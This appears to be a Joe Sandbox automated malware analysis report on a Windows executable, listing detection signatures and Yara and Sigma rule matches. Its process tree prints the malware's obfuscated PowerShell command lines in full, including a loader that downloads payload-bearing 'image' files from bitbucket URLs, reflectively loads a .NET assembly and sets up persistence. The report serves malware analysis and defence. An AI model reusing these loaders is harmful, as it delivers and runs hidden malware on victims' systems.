Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0XVZC3kfwL.exe

Overview

General Information

Sample name:0XVZC3kfwL.exe
renamed because original name is a hash value
Original sample name:278a762f5ed598ccee88a977853a7e6011759220b1095461f1c3e756a1ec725c.exe
Analysis ID:1524411
MD5:af93d5a246b37ce552356e6b61c9aec9
SHA1:e3f611e2601ff2bad622e2b1ccbdf8626f5cfd47
SHA256:278a762f5ed598ccee88a977853a7e6011759220b1095461f1c3e756a1ec725c
Tags:104-21-81-233exeuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Installs new ROOT certificates
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious powershell command line found
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 0XVZC3kfwL.exe (PID: 3832 cmdline: "C:\Users\user\Desktop\0XVZC3kfwL.exe" MD5: AF93D5A246B37CE552356E6B61C9AEC9)
    • cmd.exe (PID: 2328 cmdline: cmd /c gam.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4640 cmdline: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#G8#cgBG#EE#bQBj#G8#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • rundll32.exe (PID: 3064 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4640JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 4640INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x14cd0f:$b2: ::FromBase64String(
    • 0x17a38a:$b2: ::FromBase64String(
    • 0x14cb20:$b3: ::UTF8.GetString(
    • 0x17a19e:$b3: ::UTF8.GetString(
    • 0xa261a:$s1: -join
    • 0x1662f0:$s1: -join
    • 0x4283b:$s3: reverse
    • 0x4b146:$s3: reverse
    • 0x733ae:$s3: reverse
    • 0x7a003:$s3: reverse
    • 0x7bfea:$s3: reverse
    • 0x87019:$s3: reverse
    • 0xce87d:$s3: reverse
    • 0xda0bb:$s3: reverse
    • 0xe8dbf:$s3: reverse
    • 0xe90ad:$s3: reverse
    • 0xe97c7:$s3: reverse
    • 0xe9f80:$s3: reverse
    • 0xf106b:$s3: reverse
    • 0xf1485:$s3: reverse
    • 0xf200d:$s3: reverse
    Process Memory Space: powershell.exe PID: 6592JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 6592INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x33c3:$b2: ::FromBase64String(
      • 0x77cc8:$b2: ::FromBase64String(
      • 0xa3e34:$b2: ::FromBase64String(
      • 0xc38ac:$b2: ::FromBase64String(
      • 0xc42f1:$b2: ::FromBase64String(
      • 0xd6772:$b2: ::FromBase64String(
      • 0xfd28c:$b2: ::FromBase64String(
      • 0x1b046b:$b2: ::FromBase64String(
      • 0x24b527:$b2: ::FromBase64String(
      • 0x31d4:$b3: ::UTF8.GetString(
      • 0x77ad9:$b3: ::UTF8.GetString(
      • 0xa3c45:$b3: ::UTF8.GetString(
      • 0xc36bd:$b3: ::UTF8.GetString(
      • 0xc4102:$b3: ::UTF8.GetString(
      • 0xd6583:$b3: ::UTF8.GetString(
      • 0xfd09d:$b3: ::UTF8.GetString(
      • 0x1b027c:$b3: ::UTF8.GetString(
      • 0x24b338:$b3: ::UTF8.GetString(
      • 0x17b36:$s1: -join
      • 0x24c0b:$s1: -join
      • 0x27fdd:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_6592.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        Spreading

        barindex
        Sigma detected: Powershell download payload from hardcoded c2 list
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#